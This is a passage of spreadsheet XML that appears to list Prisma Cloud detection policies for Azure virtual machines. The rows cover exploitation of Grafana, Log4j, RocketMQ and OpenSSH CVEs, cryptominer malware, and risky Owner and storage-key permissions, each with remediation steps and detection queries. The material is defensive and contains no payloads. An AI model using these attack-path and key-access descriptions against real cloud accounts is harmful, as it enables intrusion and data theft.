      </c>
    </row>
    <row r="2552">
      <c r="A2552" t="inlineStr"/>
      <c r="B2552" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2552" s="2" t="inlineStr"/>
      <c r="D2552" t="inlineStr"/>
      <c r="E2552" t="inlineStr"/>
      <c r="F2552" t="inlineStr"/>
      <c r="G2552" t="b">
        <v>1</v>
      </c>
      <c r="H25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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2552" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2552" t="inlineStr">
        <is>
          <t>Authentication bypass (BAC &amp; Privilege Escalation) exploitation attempt on Azure Virtual Machine with known exploitable vulnerability [Grafana Snapshot Authentication Bypass, CVE-2021-39226]</t>
        </is>
      </c>
      <c r="L2552" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M2552" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2552" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2552" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2552" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q2552" t="inlineStr"/>
      <c r="R2552" t="inlineStr"/>
      <c r="S2552" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2552" t="b">
        <v>0</v>
      </c>
      <c r="U2552" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2552" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2552" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on Azure Virtual Machines that are vulnerable to authentication bypass (Privilege Escalation) with exploits in the wild [Grafana, CVE-2021-39226]. 
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable Azure Virtual Machine. The fact that the Azure Virtual Machine has a vulnerable version of Grafana software installed makes it an easy target for an attacker to exploit this vulnerability. 
Immediate attention is required to remediate the Grafana Snapshot Authentication Bypass [CVE-2021-39226] vulnerability reported for the Azure Virtual Machine.</t>
        </is>
      </c>
      <c r="X255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CVE-2021-39226
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2021-39226</t>
        </is>
      </c>
      <c r="Y2552" t="inlineStr"/>
      <c r="Z2552" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2021-39226 - Grafana Snapshot authentication bypass) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2021-39226'))</t>
        </is>
      </c>
      <c r="AA2552" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2552" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:42</t>
        </is>
      </c>
      <c r="AC2552" t="inlineStr"/>
      <c r="AD2552" t="b">
        <v>1</v>
      </c>
      <c r="AE2552" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2552" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG25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2" t="inlineStr">
        <is>
          <t>74d588f4-4911-4067-9eb5-095f1ae5bf84</t>
        </is>
      </c>
      <c r="AI2552" t="inlineStr">
        <is>
          <t>3761bf67-ea2e-45df-9037-a7f9241984d9</t>
        </is>
      </c>
      <c r="AJ2552" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2552" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2553">
      <c r="A2553" t="inlineStr"/>
      <c r="B2553" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2553" s="2" t="inlineStr"/>
      <c r="D2553" t="inlineStr"/>
      <c r="E2553" t="inlineStr"/>
      <c r="F2553" t="inlineStr"/>
      <c r="G2553" t="b">
        <v>1</v>
      </c>
      <c r="H25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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2553" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2553" t="inlineStr">
        <is>
          <t>Potential unauthorized cryptomining activity on Azure Virtual Machine affected by malware</t>
        </is>
      </c>
      <c r="L2553" t="inlineStr">
        <is>
          <t>RESOURCE_HIJACKING,MALWARE,INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M2553" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2553" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2553" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2553" t="inlineStr">
        <is>
          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q2553" t="inlineStr"/>
      <c r="R2553" t="inlineStr"/>
      <c r="S2553" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2553" t="b">
        <v>0</v>
      </c>
      <c r="U2553" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2553" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2553" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines that are affected by malware or grayware and are connected to remote systems known for cryptominer activities.
Cryptominers surreptitiously use a machine's resources to mine cryptocurrencies.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Moreover, If network connectivity with remote systems known for cryptominer activity is observed on an Azure Virtual Machine, it could indicate that the virtual machine is already under attack or has been compromised.
Immediate attention is required to remediate the malware or grayware reported for the Azure Virtual Machine as soon as possible and required to investigate cryptominer activity for the Azure Virtual Machine as soon as possible.</t>
        </is>
      </c>
      <c r="X2553"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553" t="inlineStr"/>
      <c r="Z2553" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name = (('Host contains Malware' or 'Host contains Grayware') and ('Traffic from a suspicious IP address associated with Cryptominer activity' or 'Traffic to a suspicious IP address associated with Cryptominer activity'))</t>
        </is>
      </c>
      <c r="AA2553" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2553" t="inlineStr">
        <is>
          <t>2024-01-19 05:21:09</t>
        </is>
      </c>
      <c r="AC2553" t="inlineStr"/>
      <c r="AD2553" t="b">
        <v>1</v>
      </c>
      <c r="AE2553" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2553" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG25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3" t="inlineStr">
        <is>
          <t>fd6374f6-aba8-45c1-b471-bc5571904c90</t>
        </is>
      </c>
      <c r="AI2553" t="inlineStr">
        <is>
          <t>ec65d89b-8277-4070-8b89-1ab944fe5f9a</t>
        </is>
      </c>
      <c r="AJ2553" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2553" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2554">
      <c r="A2554" t="inlineStr"/>
      <c r="B2554" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2554" s="2" t="inlineStr"/>
      <c r="D2554" t="inlineStr"/>
      <c r="E2554" t="inlineStr"/>
      <c r="F2554" t="inlineStr"/>
      <c r="G2554" t="b">
        <v>1</v>
      </c>
      <c r="H25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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2554" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2554" t="inlineStr">
        <is>
          <t>Privilege escalation, lateral movement or unauthorized cloud account actions risk due to a publicly exposed and vulnerable Azure Virtual Machine with Azure built-in roles Owner permissions</t>
        </is>
      </c>
      <c r="L2554" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2554" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2554" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2554" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2554" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2554" t="inlineStr"/>
      <c r="R2554" t="inlineStr"/>
      <c r="S2554" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2554" t="b">
        <v>0</v>
      </c>
      <c r="U2554" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2554" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2554" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines which are publicly exposed, have critical or high vulnerabilities, and have Azure built-in roles of Owner permissions.
Publicly exposed vulnerable Virtual Machines could allow malicious actors to remotely exploit the vulnerability to get initial access to the instance. The Built-in Owner role grants full access to manage all resources in the scope, including the ability to assign roles in Azure RBAC. The Built-in Owner role on the instance further helps the attackers to escalate their privileges, move laterally or perform other unauthorized actions in the cloud account.
Immediate attention is required to review role assignments and grant only the least privileges required. Remove unwanted roles assigned to the Virtual Machines. Remediate critical and high vulnerabilities, and restrict public exposure reported for the instances as soon as possible.</t>
        </is>
      </c>
      <c r="X255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VM from the list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54" t="inlineStr"/>
      <c r="Z2554" t="inlineStr">
        <is>
          <t>asset where asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)','Azure VM instance associated managed identity with Azure built-in roles of Owner permissions') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA2554" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2554" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:23</t>
        </is>
      </c>
      <c r="AC2554" t="inlineStr"/>
      <c r="AD2554" t="b">
        <v>1</v>
      </c>
      <c r="AE2554" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2554" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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4" t="inlineStr">
        <is>
          <t>ad3ac1a0-aa12-4057-aa52-c8853a798736</t>
        </is>
      </c>
      <c r="AI2554" t="inlineStr">
        <is>
          <t>10922b62-affc-43a1-929a-668d1ae4e8ff</t>
        </is>
      </c>
      <c r="AJ2554" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2554" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2555">
      <c r="A2555" t="inlineStr"/>
      <c r="B2555" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2555" s="2" t="inlineStr"/>
      <c r="D2555" t="inlineStr"/>
      <c r="E2555" t="inlineStr"/>
      <c r="F2555" t="inlineStr"/>
      <c r="G2555" t="b">
        <v>1</v>
      </c>
      <c r="H25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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2555" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2555" t="inlineStr">
        <is>
          <t>Data exfiltration or destruction risk due to a publicly exposed and vulnerable Azure Virtual Machine with hazardous Storage account permissions</t>
        </is>
      </c>
      <c r="L2555" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2555" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2555" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2555" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2555" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2555" t="inlineStr"/>
      <c r="R2555" t="inlineStr"/>
      <c r="S2555" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2555" t="b">
        <v>0</v>
      </c>
      <c r="U2555" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2555" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2555" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines that are publicly exposed with critical or high vulnerabilities and have risky Storage account permissions.
Publicly exposed and vulnerable Azure Virtual Machine could allow malicious actors to remotely exploit the vulnerability to get initial access to the instance. Storage accounts might hold sensitive information, publicly exposed, and vulnerable VM having write permission on such storage accounts can damage or exfiltrate data that can adversely affect organizations.
This policy checks for the following risky permissions:
'Microsoft.Storage/storageAccounts/write', 'Microsoft.Storage/storageAccounts/listKeys/action', 'Microsoft.Storage/storageAccounts/regeneratekey/action', 'Microsoft.Storage/storageAccounts/delete', 'Microsoft.Storage/storageAccounts/ListAccountSas/action'
Immediate attention is required to grant the least privileges and remove unwanted risky permissions assigned to the VM instance, remediate critical and high vulnerabilities, and restrict public exposure reported for the virtual machines as soon as possible.</t>
        </is>
      </c>
      <c r="X255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55" t="inlineStr"/>
      <c r="Z2555" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)','Azure VM instance with risky Storage account permissions') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA2555" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2555" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:23</t>
        </is>
      </c>
      <c r="AC2555" t="inlineStr"/>
      <c r="AD2555" t="b">
        <v>1</v>
      </c>
      <c r="AE2555" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2555" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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5" t="inlineStr">
        <is>
          <t>19f5c279-b0fc-41d7-8e7c-cd39a5d0107b</t>
        </is>
      </c>
      <c r="AI2555" t="inlineStr">
        <is>
          <t>620c16a5-27d9-4289-9bb8-01705b613c1a</t>
        </is>
      </c>
      <c r="AJ2555" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2555" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2556">
      <c r="A2556" t="inlineStr"/>
      <c r="B2556" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2556" s="2" t="inlineStr"/>
      <c r="D2556" t="inlineStr"/>
      <c r="E2556" t="inlineStr"/>
      <c r="F2556" t="inlineStr"/>
      <c r="G2556" t="b">
        <v>1</v>
      </c>
      <c r="H25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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2556" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2556" t="inlineStr">
        <is>
          <t>Potential risk of remote code execution due to vulnerable Log4j and public exposure on ports 80/443 on an Azure Virtual machine [Apache Log4j, CVE-2021-44228, CVE-2021-45046]</t>
        </is>
      </c>
      <c r="L2556" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2556" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2556" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2556" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2556" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2556" t="inlineStr"/>
      <c r="R2556" t="inlineStr"/>
      <c r="S2556" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2556" t="b">
        <v>0</v>
      </c>
      <c r="U2556" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2556" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2556" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines that are exposed to 80/443 ports Log4Shell vulnerabilities [Apache Log4j, CVE-2021-44228, CVE-2021-45046].
The Log4j vulnerability allows remote attackers to execute arbitrary code on a target system by exploiting a flaw in the library's handling of JNDI (Java Naming and Directory Interface) lookups. Specifically, it occurs due to improper input validation when processing user-supplied data in log messages. Attackers can craft specially crafted log messages that trigger a JNDI lookup to a malicious server controlled by them. This can lead to remote code execution on the affected system, making it a severe security issue. The fact the common web server ports 80/443 open to internet makes it an easy target for an attacker to compromise the affected system.
Immediate attention is required to restrict the public exposure of the affected Azure Virtual Machines and remediate the Apache Log4j [CVE-2021-44228, CVE-2021-45046] vulnerabilities.</t>
        </is>
      </c>
      <c r="X255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(http/80, https/443) 
6. Set the 'Source' to the 'IP addresses' and enter trusted IP address or CIDR range in 'Source IP addresses/CIDR ranges'
7. Click 'Save' to apply the changes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
   https://nvd.nist.gov/vuln/detail/CVE-2021-45046</t>
        </is>
      </c>
      <c r="Y2556" t="inlineStr"/>
      <c r="Z2556" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0) on ports 80/443') AND with : (Vuln WHERE id IN ('CVE-2021-44228','CVE-2021-45046'))</t>
        </is>
      </c>
      <c r="AA2556" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2556" t="inlineStr">
        <is>
          <t>2023-11-10 07:02:50</t>
        </is>
      </c>
      <c r="AC2556" t="inlineStr"/>
      <c r="AD2556" t="b">
        <v>1</v>
      </c>
      <c r="AE2556" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2556" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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6" t="inlineStr">
        <is>
          <t>024d0f1a-760e-4d8a-a14f-cf33b923cc50</t>
        </is>
      </c>
      <c r="AI2556" t="inlineStr">
        <is>
          <t>26ece450-539c-497c-a45d-eb5413c1b7ac</t>
        </is>
      </c>
      <c r="AJ2556" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2556" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2557">
      <c r="A2557" t="inlineStr"/>
      <c r="B2557" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2557" s="2" t="inlineStr"/>
      <c r="D2557" t="inlineStr"/>
      <c r="E2557" t="inlineStr"/>
      <c r="F2557" t="inlineStr"/>
      <c r="G2557" t="b">
        <v>1</v>
      </c>
      <c r="H25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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2557" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2557" t="inlineStr">
        <is>
          <t>Command execution risk due to publicly exposed and vulnerable Azure Virtual Machine (Apache RocketMQ, CVE-2023-33246)</t>
        </is>
      </c>
      <c r="L2557" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2557" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2557" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2557" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2557" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2557" t="inlineStr"/>
      <c r="R2557" t="inlineStr"/>
      <c r="S2557" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2557" t="b">
        <v>0</v>
      </c>
      <c r="U2557" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2557" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2557" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machine that are publicly exposed and have known exploitable Command execution vulnerability (CVE-2023-33246).
Command execution vulnerability would allow an attacker to execute arbitrary commands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RocketMQ Command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RocketMQ (CVE-2023-33246) vulnerability and public exposure reported for the affected Azure Virtual Machine as soon as possible.</t>
        </is>
      </c>
      <c r="X2557"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CVE-2023-33246
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2023-33246</t>
        </is>
      </c>
      <c r="Y2557" t="inlineStr"/>
      <c r="Z2557" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2023-33246'))</t>
        </is>
      </c>
      <c r="AA2557" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2557" t="inlineStr">
        <is>
          <t>2024-03-05 05:47:17</t>
        </is>
      </c>
      <c r="AC2557" t="inlineStr"/>
      <c r="AD2557" t="b">
        <v>1</v>
      </c>
      <c r="AE2557" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2557" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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7" t="inlineStr">
        <is>
          <t>660a5004-ebe0-4e00-b913-84f38d49a9a0</t>
        </is>
      </c>
      <c r="AI2557" t="inlineStr">
        <is>
          <t>3c16e31e-1421-4a25-854e-e5870093c99f</t>
        </is>
      </c>
      <c r="AJ2557" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2557" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2558">
      <c r="A2558" t="inlineStr"/>
      <c r="B2558" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2558" s="2" t="inlineStr"/>
      <c r="D2558" t="inlineStr"/>
      <c r="E2558" t="inlineStr"/>
      <c r="F2558" t="inlineStr"/>
      <c r="G2558" t="b">
        <v>1</v>
      </c>
      <c r="H25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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2558" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2558" t="inlineStr">
        <is>
          <t>Remote code execution risk due to publicly exposed and vulnerable Azure Virtual Machine (OpenSSH, CVE-2023-38408)</t>
        </is>
      </c>
      <c r="L2558" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2558" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2558" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2558" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2558" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2558" t="inlineStr"/>
      <c r="R2558" t="inlineStr"/>
      <c r="S2558" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2558" t="b">
        <v>0</v>
      </c>
      <c r="U2558" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2558" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2558" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machine that are publicly exposed and have known exploitable Remote code execution vulnerability (CVE-2023-38408).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OpenSSH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OpenSSH (CVE-2023-38408) vulnerability and public exposure reported for the affected Azure Virtual Machine as soon as possible.</t>
        </is>
      </c>
      <c r="X2558"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CVE-2023-38408
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2023-38408</t>
        </is>
      </c>
      <c r="Y2558" t="inlineStr"/>
      <c r="Z2558" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2023-38408'))</t>
        </is>
      </c>
      <c r="AA2558" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2558" t="inlineStr">
        <is>
          <t>2024-03-05 05:47:11</t>
        </is>
      </c>
      <c r="AC2558" t="inlineStr"/>
      <c r="AD2558" t="b">
        <v>1</v>
      </c>
      <c r="AE2558" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2558" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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8" t="inlineStr">
        <is>
          <t>1cc4f80a-d195-4412-8c50-a229bb9f95be</t>
        </is>
      </c>
      <c r="AI2558" t="inlineStr">
        <is>
          <t>bcbfeed8-add9-4374-8c04-499e22e97f25</t>
        </is>
      </c>
      <c r="AJ2558" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2558" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2559">
      <c r="A2559" t="inlineStr">
        <is>
          <t>TX-RAMP Level 1, ITSG-33, TX-RAMP Level 2, Insurance Regulatory And Development Authority Of India, TX-RAMP Level 2, SOC 2, ITSG-33</t>
        </is>
      </c>
      <c r="B2559" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2559" s="2" t="inlineStr"/>
      <c r="D2559" t="inlineStr"/>
      <c r="E2559" t="inlineStr"/>
      <c r="F2559" t="inlineStr"/>
      <c r="G2559" t="b">
        <v>1</v>
      </c>
      <c r="H25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59" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2559" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2559" t="inlineStr">
        <is>
          <t>Azure Virtual Machine (Linux) does not authenticate using SSH keys</t>
        </is>
      </c>
      <c r="L2559" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2559" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2559" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2559" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2559" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2559" t="inlineStr">
        <is>
          <t>IA</t>
        </is>
      </c>
      <c r="R2559" t="inlineStr">
        <is>
          <t>IA-5:Authenticator Management</t>
        </is>
      </c>
      <c r="S2559" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T2559" t="b">
        <v>0</v>
      </c>
      <c r="U2559" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2559" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2559" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines that have basic authentication, not authenticating using SSH keys. Azure Virtual Machines with basic authentication could allow attackers to brute force and gain unauthorized access, which might lead to potential data leaks. It is recommended to use SSH keys for authentication to avoid brute force attacks on virtual machines.</t>
        </is>
      </c>
      <c r="X2559" t="inlineStr">
        <is>
          <t>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Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-1
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-1</t>
        </is>
      </c>
      <c r="Y2559" t="inlineStr"/>
      <c r="Z2559" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-vm-list' AND json.rule = powerState equal ignore case "PowerState/running" and (['properties.osProfile'].['linuxConfiguration'] exists and ['properties.osProfile'].['linuxConfiguration'].['disablePasswordAuthentication'] is false)
{"category":"General","resourceTypes":["azurerm_linux_virtual_machine","azurerm_virtual_machine"]}</t>
        </is>
      </c>
      <c r="AA2559" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2559" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2559" t="inlineStr">
        <is>
          <t>PC-AZR-CMP-1073-CKV_AZURE_1</t>
        </is>
      </c>
      <c r="AD2559" t="b">
        <v>1</v>
      </c>
      <c r="AE2559" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2559" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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59" t="inlineStr">
        <is>
          <t>7f59ef1f-0cbe-48cf-8358-05013b6a8a95</t>
        </is>
      </c>
      <c r="AI2559" t="inlineStr">
        <is>
          <t>ff4fcb80-03f6-41dd-8bd8-6179fd46b3a4</t>
        </is>
      </c>
      <c r="AJ2559" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
